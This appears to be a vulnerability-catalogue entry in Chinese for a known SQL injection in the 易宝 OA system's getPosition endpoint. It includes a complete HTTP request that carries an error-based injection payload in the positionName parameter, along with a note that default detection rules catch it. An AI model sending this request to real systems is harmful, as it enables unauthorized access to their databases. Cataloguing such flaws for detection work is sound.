vendor = "易宝"
name = "易宝OA-getPosition存在sql注入"
type = "SQL注入"
version = "未知"
path = "/SmartTradeScan/StockTake/getPosition"
detail = "GET /SmartTradeScan/StockTake/getPosition?positionName=%27%20AND%202328%20IN%20(SELECT%20(CHAR(113)+CHAR(118)+CHAR(112)+CHAR(120)+CHAR(113)+(SELECT%20(CASE%20WHEN%20(2328=2328)%20THEN%20CHAR(49)%20ELSE%20CHAR(48)%20END))+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(98)+CHAR(113)))%20AND%20%27EHJe%27=%27EHJe&stockRoomID=1&opeID=1&currentStatus=1&pickUpMode=11 HTTP/1.1 Host: Accept-Encoding: gzip, deflate, br Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Cache-Control: max-age=0"
fix = "缺省规则可检出，除非设备规则太烂"
date = "0703"
label = "nday"
verifier = "AdySec"
